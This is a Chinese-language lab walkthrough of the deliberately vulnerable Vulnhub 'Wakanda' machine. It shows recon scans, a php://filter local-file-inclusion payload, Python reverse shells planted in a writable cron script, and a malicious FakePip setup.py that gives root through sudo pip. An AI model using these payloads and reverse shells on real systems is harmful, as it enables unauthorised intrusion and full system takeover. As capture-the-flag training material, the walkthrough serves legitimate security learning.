Vulnhub靶机Wakanda渗透测试攻略

前言
Wakanda是一个新的交易市场网站，很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。

页首配图

本vulnhub靶机环境由xMagass开发，并托管于Vulnhub，这台靶机上包含了很多很酷的技巧。

百度网盘下载地址：

链接：https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码：aixl

难度级别:中级。

用virtualbox导入Wakanda_1.ova靶机环境，修改其网络连接方式为Bridged（桥接网卡），并选择一个可用于联网的网卡（例如，我使用的无线网卡上网，在图中网卡为Inter® Dual Band Wireless-AC 7260）。

1、运行arp-scan识别目标的IP地址
由于kali和wakanda靶机都运行在桥接网卡模式下，因此处于同一个局域网内。我们可以先利用ip a命令查看kali的IP地址，再使用netdiscover或arp-scan命令查看同一个局域网的中另外还有哪些存活主机。

(1) 利用ip a命令查看kali的IP地址
root@kali:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:e2:40:00 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.104/24 brd 192.168.0.255 scope global dynamic eth0
valid_lft 5339sec preferred_lft 5339sec
inet6 fe80::a00:27ff:fee2:4000/64 scope link
valid_lft forever preferred_lft forever
从中可以看出，kali在网卡eth0上的IP地址和掩码为192.168.0.104/24。
IT资源论坛：www.hoopeng.cn
(2) 查看同一个局域网的存活主机
root@kali:~# netdiscover -i eth0
Currently scanning: 192.168.10.0/16 | Screen View: Unique Hosts

7 Captured ARP Req/Rep packets, from 5 hosts. Total size: 420

IP At MAC Address Count Len MAC Vendor / Hostname

192.168.0.1 24:69:68:22:e8:1e 3 180 TP-LINK TECHNOLOGIES CO.,LTD.
192.168.0.103 6c:29:95:10:38:1c 1 60 Intel Corporate
192.168.0.106 08:00:27:ac:03:43 1 60 PCS Systemtechnik GmbH
192.168.0.100 bc:9f:ef:df:b6:e6 1 60 Unknown vendor
192.168.0.102 2c:61:f6:88:ae:9c 1 60 Unknown vendor
root@kali:~#
root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.0.1 24:69:68:22:e8:1e (Unknown)
192.168.0.103 6c:29:95:10:38:1c Intel Corporate
192.168.0.106 08:00:27:ac:03:43 CADMUS COMPUTER SYSTEMS
192.168.0.101 44:c3:46:11:5b:07 (Unknown)
192.168.0.100 bc:9f:ef:df:b6:e6 (Unknown)

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.253 seconds (113.63 hosts/sec). 5 responded
从中可以看出，使用CADMUS COMPUTER SYSTEMS网卡的IP就是靶机（vulnhub靶机的网卡地址一般都是CADMUS COMPUTER SYSTEMS），其IP地址为192.168.0.106。

2、枚举和初步搜索信息
利用NMap执行全TCP端口扫描,我发现只有一个感兴趣的web应用程序，该网站上声明了这个即将开放的Vibranium交易市场。另外，还开放了一个运行在非默认端口上的的SSH服务（默认端口22、而此SSH服务运行在端口3333上）。

(1) nmap全端口扫描
root@kali:~# nmap -sS -p- 192.168.0.106

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2018-09-20 09:56 CST
Nmap scan report for localhost (192.168.0.106)
Host is up (0.000096s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3333/tcp open dec-notes
59197/tcp open unknown
MAC Address: 08:00:27:AC:03:43 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds
从nmap端口扫描结果来看，80端口上开放了一个WEB程序。3333端口上运行的是SSH服务。

(2) 使用Nikto扫描网站漏洞
root@kali:~# nikto -h http://192.168.0.106/

Nikto v2.1.6

Target IP: 192.168.0.106
Target Hostname: 192.168.0.106
Target Port: 80
Start Time: 2018-09-20 09:12:14 (GMT8)

Server: Apache/2.4.10 (Debian)
The anti-clickjacking X-Frame-Options header is not present.
The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
No CGI Directories found (use ‘-C all’ to force check all possible dirs)
Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
Web Server returns a valid response with junk HTTP methods, this may cause false positives.
Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
OSVDB-3233: /icons/README: Apache default file found.
7535 requests: 0 error(s) and 7 item(s) reported on remote host
End Time: 2018-09-20 09:13:28 (GMT8) (74 seconds)

1 host(s) tested
从nikto扫描结果来看，并没有任何可利用的漏洞、或信息泄露。

(3) 目录枚举
由于使用nikto没有看到有用信息，我们再尝试使用dirb来暴力枚举目录。国内可以使用御剑等工具，但是这是国外的靶机环境，建议都用kali的通用工具就好。

root@kali:~# dirb http://192.168.0.106/

DIRB v2.22
By The Dark Raver

START_TIME: Thu Sep 20 09:19:02 2018
URL_BASE: http://192.168.0.106/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.0.106/ ----

http://192.168.0.106/admin (CODE:200|SIZE:0)
http://192.168.0.106/backup (CODE:200|SIZE:0)
http://192.168.0.106/index.php (CODE:200|SIZE:1527)
http://192.168.0.106/secret (CODE:200|SIZE:0)
http://192.168.0.106/server-status (CODE:403|SIZE:301)
http://192.168.0.106/shell (CODE:200|SIZE:0)

END_TIME: Thu Sep 20 09:19:05 2018
DOWNLOADED: 4612 - FOUND: 6
尝试访问http://192.168.0.106/admin, backup, secret等URL，都没有返回任何信息。

(4) 查看网站源码
在网页源码中，找到一条注释，其中包含了有用的信息：

在?lang=fr中，lang表示可切换的网站语言（网站常常具支持多语言，例如英语、法语、中文等），fr表示法语。我们尝试在HTTP URL中添加这个参数，切换语言为法语。

我们发现之前的英语内容切换成了法语：

原英语内容：
Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!

现法语内容：
Prochaine ouverture du plus grand marché du vibranium. Les produits viennent directement du wakanda. Restez à l’écoute!
根据以往的渗透测试经验，这里很可能存在本地文件包含(LFI)或远程文件包含(RFI)漏洞。

3、利用LFI读取源码
在尝试访问http://192.168.0.106/?lang=index等url未获得有用信息后，我们尝试php伪协议。http://192.168.0.106/?lang=php://filter/convert.base64-encode/resource=index

得到了index.php的base64加密后的源码，解密后发现了一个Password。

PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=<?php
$password =“Niamey4Ever227!!!” ;//I have to remember it

if (isset(KaTeX parse error: Expected '}', got 'EOF' at end of input: …'])) { include(_GET[‘lang’].".php");
}
由于网站没有登录后台，我们尝试利用这个密码登录SSH服务。在尝试用户名root、admin等无效后，我们发现网站下文的信息Made by@mamadou，于是尝试用户名mamadou。

root@kali:~# ssh mamadou@192.168.0.106 -p 3333
The authenticity of host ‘[192.168.0.106]:3333 ([192.168.0.106]:3333)’ can’t be established.
ECDSA key fingerprint is SHA256:X+fXjgH34Ta5l6I4kUSpiVZNBGGBGtjxZxgyU7KCFwk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ‘[192.168.0.106]:3333’ (ECDSA) to the list of known hosts.
mamadou@192.168.0.106’s password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Sep 19 06:26:23 2018 from kali
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type “help”, “copyright”, “credits” or “license” for more information.

ls
Traceback (most recent call last):
File “”, line 1, in
NameError: name ‘ls’ is not defined

4、获得敏感信息
（1）切换BASH环境
登录后，发现mamadou使用的shell不是/bin/bash，而是python。

我们可以执行python命令来获得靶机上的敏感信息。也可以利用python语句切换到/bin/bash。

import pty
pty.spawn("/bin/bash")
mamadou@Wakanda1:~$ id
uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
mamadou@Wakanda1:~$
利用上面的import pty、pty.spawn("/bin/bash")两条命令，即可切换到bash下。

（2）获得第一个flag
在mamadou的用户目录下，找到了第一个flag。

mamadou@Wakanda1:~$ pwd
/home/mamadou
mamadou@Wakanda1:~$ ls -lar
total 24
-rw-r–r-- 1 mamadou mamadou 675 Aug 1 13:15 .profile
-rw-r–r-- 1 mamadou mamadou 41 Aug 1 15:52 flag1.txt
-rw-r–r-- 1 mamadou mamadou 3515 Aug 1 13:15 .bashrc
-rw-r–r-- 1 mamadou mamadou 220 Aug 1 13:15 .bash_logout
lrwxrwxrwx 1 root root 9 Aug 5 02:24 .bash_history -> /dev/null
drwxr-xr-x 4 root root 4096 Aug 1 15:23 …
drwxr-xr-x 2 mamadou mamadou 4096 Sep 19 06:28 .
mamadou@Wakanda1:~$ cat flag1.txt

Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
另外，我们再搜索其他目录，查看是否有flag。

mamadou@Wakanda1:~$ find / --name “flag” 2>/dev/null

没有发现flag文件，可能是mamadou无权访问。

在网站目录/var/www/html下，也未找到有用的信息。

mamadou@Wakanda1:~$ cd /var/www/html/
mamadou@Wakanda1:/var/www/html$ ls -la
total 4572
drwxr-xr-x 2 root root 4096 Aug 1 16:51 .
drwxr-xr-x 3 root root 4096 Aug 1 13:29 …
-rw-r–r-- 1 root root 0 Aug 1 16:50 admin
-rw-r–r-- 1 root root 0 Aug 1 16:50 backup
-rw-r–r-- 1 root root 4510077 Aug 1 14:26 bg.jpg
-rw-r–r-- 1 root root 140936 Aug 1 14:07 bootstrap.css
-rw-r–r-- 1 root root 1464 Aug 1 14:29 cover.css
-rw-r–r-- 1 root root 141 Aug 1 16:45 fr.php
-rw-r–r-- 1 root root 0 Aug 1 16:50 hahaha
-rw-r–r-- 1 root root 0 Aug 1 16:51 hohoho
-rw-r–r-- 1 root root 1811 Aug 1 16:44 index.php
-rw-r–r-- 1 root root 0 Aug 1 16:50 secret
-rw-r–r-- 1 root root 40 Aug 1 16:51 secret.txt
-rw-r–r-- 1 root root 0 Aug 1 16:50 shell
-rw-r–r-- 1 root root 0 Aug 1 16:50 troll
mamadou@Wakanda1:/var/www/html$ cat secret.txt
Congratulations!

Nope!I am joking…
这里可以看到，dirb扫描出的admin等欺骗性文件的大小都为0，没有任何内容。

（3）查看用户是否有sudo权限
mamadou@Wakanda1:~$ sudo -l
[sudo] password for mamadou:
Sorry, user mamadou may not run sudo on Wakanda1.
发现mamadou用户没有sudo权限。

5、利用其他用户的权限
（1) 查看其他用户
这时，我们再查看靶机上是否有其他用户。

mamadou@Wakanda1:~$ cat /etc/passwd
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12?/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync❌100:103:systemd Time Synchronization,:/run/systemd:/bin/false
systemd-network❌101:104:systemd Network Management,:/run/systemd/netif:/bin/false
systemd-resolve❌102:105:systemd Resolver,:/run/systemd/resolve:/bin/false
systemd-bus-proxy❌103:106:systemd Bus Proxy,:/run/systemd:/bin/false
Debian-exim❌104:109::/var/spool/exim4:/bin/false
messagebus❌105:110::/var/run/dbus:/bin/false
statd❌106:65534::/var/lib/nfs:/bin/false
avahi-autoipd❌107:113:Avahi autoip daemon,:/var/lib/avahi-autoipd:/bin/false
sshd❌108:65534::/var/run/sshd:/usr/sbin/nologin
mamadou❌1000:1000:Mamadou,Developper:/home/mamadou:/usr/bin/python
devops❌1001:1002:,:/home/devops:/bin/bash
从中发现另一个devops用户。我们再搜索他是否有敏感信息：

mamadou@Wakanda1:~$ cd /home/devops/
mamadou@Wakanda1:/home/devops$ ls -la
total 28
drwxr-xr-x 3 devops developer 4096 Sep 19 06:50 .
drwxr-xr-x 4 root root 4096 Aug 1 15:23 …
lrwxrwxrwx 1 root root 9 Aug 5 02:25 .bash_history -> /dev/null
-rw-r–r-- 1 devops developer 220 Aug 1 15:23 .bash_logout
-rw-r–r-- 1 devops developer 3515 Aug 1 15:23 .bashrc
-rw-r----- 1 devops developer 42 Aug 1 15:57 flag2.txt
-rw-r–r-- 1 devops developer 675 Aug 1 15:23 .profile
mamadou@Wakanda1:/home/devops$ cat flag2.txt
cat: flag2.txt: Permission denied
发现了一个flag2.txt，但是mamadou没权限查看其内容。于是尝试切换到该用户。没有密码，只能想其他方法。

（2）信息搜索
在/tmp目录中，发现一个新建的test文件：

mamadou@Wakanda1:~$ cd /tmp
mamadou@Wakanda1:/tmp$ ls -laR
.:
total 32
drwxrwxrwt 7 root root 4096 Sep 19 21:42 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 …
drwxrwxrwt 2 root root 4096 Sep 19 20:49 .font-unix
drwxrwxrwt 2 root root 4096 Sep 19 20:49 .ICE-unix
-rw-r–r-- 1 devops developer 4 Sep 19 21:46 test
drwxrwxrwt 2 root root 4096 Sep 19 20:49 .Test-unix
drwxrwxrwt 2 root root 4096 Sep 19 20:49 .X11-unix
drwxrwxrwt 2 root root 4096 Sep 19 20:49 .XIM-unix

mamadou@Wakanda1:/tmp$ date
Wed Sep 19 21:47:59 EDT 2018
test文件的创建时间为Sep 19 21:46，明显晚于其他文件的创建日期；使用date命令查看靶机的当前时间，为Wed Sep 19 21:47:59，说明test文件是2分钟内才新建的。我们怀疑靶机上运行了一个程序，定期执行创建test文件。

最终，在/srv目录下，找到了这个定期运行的文件：

mamadou@Wakanda1:/tmp$ cd /srv/
mamadou@Wakanda1:/srv$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Aug 1 17:52 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 …
-rw-r–rw- 1 devops developer 37 Sep 19 21:49 .antivirus.py
mamadou@Wakanda1:/srv$ cat .antivirus.py
open(’/tmp/test’,‘w’).write(‘test’)
文件.antivirus.py是一个python脚本，其拥有者是devops，所属组为developer，而且任何人都可以修改它！

我们可以通过修改其文件内容，尝试获得反向shell。

建立反向shell
修改python脚本，添加反向shell的内容：

mamadou@Wakanda1:/srv$ vi .antivirus.py
mamadou@Wakanda1:/srv$ cat .antivirus.py
open(’/tmp/test’,‘w’).write(‘test’)
import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((“192.168.0.104”,1235))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
修改完成后，我们侦听1235端口，等待靶机的反向shell连接：

root@kali:~# nc -lvvp 1235
在等了几分钟后，成功获得了shell连接。并获得了第二个flag。

root@kali:~# nc -lvvp 1235
listening on [any] 1235 …
connect to [192.168.0.104] from localhost [192.168.0.106] 60823
bash: cannot set terminal process group (1107): Inappropriate ioctl for device
bash: no job control in this shell
devops@Wakanda1:/$ id
uid=1001(devops) gid=1002(developer) groups=1002(developer)
devops@Wakanda1:/$ cd
devops@Wakanda1:~$ pwd
/home/devops
devops@Wakanda1:~$ ls -la
total 28
drwxr-xr-x 3 devops developer 4096 Sep 19 06:50 .
drwxr-xr-x 4 root root 4096 Aug 1 15:23 …
lrwxrwxrwx 1 root root 9 Aug 5 02:25 .bash_history -> /dev/null
-rw-r–r-- 1 devops developer 220 Aug 1 15:23 .bash_logout
-rw-r–r-- 1 devops developer 3515 Aug 1 15:23 .bashrc
-rw-r----- 1 devops developer 42 Aug 1 15:57 flag2.txt
-rw-r–r-- 1 devops developer 675 Aug 1 15:23 .profile
devops@Wakanda1:~$ cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
6、提权到root
我们的最终目标是获得root权限。

（1）查看用户devops的sudo权限
devops@Wakanda1:/$ sudo -l
sudo -l
Matching Defaults entries for devops on Wakanda1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip
发现用户devops可无密码执行的sudo命令只有/usr/bin/pip。从来没有遇到这种情况，在网上搜索了好久，找到一种提权方法：fakepip exploit。具体的漏洞利用方法已写得很清楚。

（2）利用pip升级漏洞
由于在靶机上无法高效地编辑exp，我们先在kali上将exp下载下来，再编辑，最后上传到靶机上。

A.下载

root@kali:~# mkdir FakePip
root@kali:~# cd FakePip/
root@kali:~/FakePip# wget https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py
–2018-09-20 10:30:04-- https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)… 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 983 [text/plain]
Saving to: ?.etup.py?

setup.py 100%[============================>] 983 --.-KB/s in 0s

2018-09-20 10:30:05 (4.20 MB/s) - ?.etup.py?.saved [983/983]
B.修改反弹地址

修改setup.py中的RHOST = ‘10.0.0.1’ # change this语句为kali的IP地址。例如，我的kali的IP地址为：192.168.0.104。

root@kali:~/FakePip# vi setup.py
root@kali:~/FakePip# cat setup.py
from setuptools import setup
from setuptools.command.install import install
import base64
import os

class CustomInstall(install):
def run(self):
install.run(self)
RHOST = ‘192.168.0.104’ # change this

reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 443; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
encoded = base64.b64encode(reverse_shell)
os.system('echo %s|base64 -d|bash' % encoded)

setup(name=‘FakePip’,
version=‘0.0.1’,
description=‘This will exploit a sudoer able to /usr/bin/pip install *’,
url=‘https://github.com/0x00-0x00/fakepip’,
author=‘zc00l’,
author_email=‘andre.marques@esecurity.com.br’,
license=‘MIT’,
zip_safe=False,
cmdclass={‘install’: CustomInstall})
C.利用python建立SimpleHTTPServer

root@kali:~/FakePip# python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 …
执行python -m SimpleHTTPServer 8888后，就在KALI上运行了一个简易的HTTP服务器，在靶机上就可从这个HTTP服务器下载setup.py脚本了。

D.下载exp

在靶机的devops用户下，下载setup.py脚本。

devops@Wakanda1:~$ mkdir fakepip
devops@Wakanda1:~$ cd fakepip
devops@Wakanda1:~/fakepip$ wget http://192.168.0.104:8888/setup.py
–2018-09-19 22:34:45-- http://192.168.0.104:8888/setup.py
Connecting to 192.168.0.104:8888… connected.
HTTP request sent, awaiting response… 200 OK
Length: 988 [text/plain]
Saving to: ?.etup.py?

 0K                                                       100%  127M=0s

2018-09-19 22:34:45 (127 MB/s) - ?.etup.py?.saved [988/988]
devops@Wakanda1:~/fakepip$ ls
setup.py
可以看到，成功地下载了脚本。

E.在kali中侦听443端口

root@kali:~/FakePip# nc -lvvp 443

F.执行exp，获得反向shell

在靶机上执行命令sudo /usr/bin/pip install . --upgrade --force-reinstall，即可在kali上发现，成功获得了反向shell。

devops@Wakanda1:~/fakepip$ sudo /usr/bin/pip install . --upgrade --force-reinstall
<sudo /usr/bin/pip install . --upgrade --force-reinstall
Unpacking /home/devops/fakepip
Running setup.py (path:/tmp/pip-G7z4Td-build/setup.py) egg_info for package from file:///home/devops/fakepip

Installing collected packages: FakePip
Found existing installation: FakePip 0.0.1
Uninstalling FakePip:
Successfully uninstalled FakePip
Running setup.py install for FakePip
在kali上的反向shell权限是root，即最高权限。

root@kali:~/FakePip# nc -lvvp 443
listening on [any] 443 …
connect to [192.168.0.104] from localhost [192.168.0.106] 55143
root@Wakanda1:/tmp/pip-G7z4Td-build# id
uid=0(root) gid=0(root) groups=0(root)
root@Wakanda1:/tmp/pip-G7z4Td-build#
7、查看最终flag
root@Wakanda1:/tmp/pip-G7z4Td-build# cd
cd
root@Wakanda1:~# ls -la
ls -la
total 20
drwx------ 2 root root 4096 Aug 5 02:26 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 …
-rw-r–r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r–r-- 1 root root 140 Nov 19 2007 .profile
-rw-r----- 1 root root 429 Aug 1 15:16 root.txt
root@Wakanda1:~# cat root.txt
cat root.txt
_ .–..–.
( )=.-":;:;:;;’:;:;:;"-.
\:;:;:;:;:;;:;::;:;:;:
\:;:;:;:;:;;:;:;:;:;:;
\:;::;:;:;:;:;::;:;:;:
\:;:;:;:;:;;:;::;:;:;:
\:;::;:;:;:;:;::;:;:;:
\;;:;::–:::–:;:;
\_.-" "-.
\
\
\
\ Wakanda 1 - by @xMagass
\
\

Congratulations You are Root!

821ae63dbe0c573eff8b69d451fb21bc